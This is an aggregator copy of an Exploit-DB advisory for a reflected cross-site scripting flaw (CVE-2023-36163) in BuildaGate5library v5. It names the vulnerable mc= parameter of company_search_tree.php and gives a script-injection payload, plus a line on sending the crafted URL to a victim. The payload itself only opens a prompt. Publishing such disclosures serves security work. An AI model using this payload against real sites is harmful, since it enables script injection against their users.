4
[webapps] BuildaGate5library v5 - Reflected Cross-Site Scripting (XSS)
source link: https://www.exploit-db.com/exploits/51581
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
BuildaGate5library v5 - Reflected Cross-Site Scripting (XSS)
# Exploit Title: BuildaGate5library v5 - Reflected Cross-Site Scripting (XSS)
# Date: 06/07/2023
# Exploit Author: Idan Malihi
# Vendor Homepage: None
# Version: 5
# Tested on: Microsoft Windows 10 Pro
# CVE : CVE-2023-36163
#PoC:
An attacker just needs to find the vulnerable parameter (mc=) and inject the JS code like:
'><script>prompt("XSS");</script><div id="aa
After that, the attacker needs to send the full URL with the JS code to the victim and inject their browser.
#Payload:
company_search_tree.php?mc=aaa'><script>prompt("XSS");</script><div id="aaaa
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK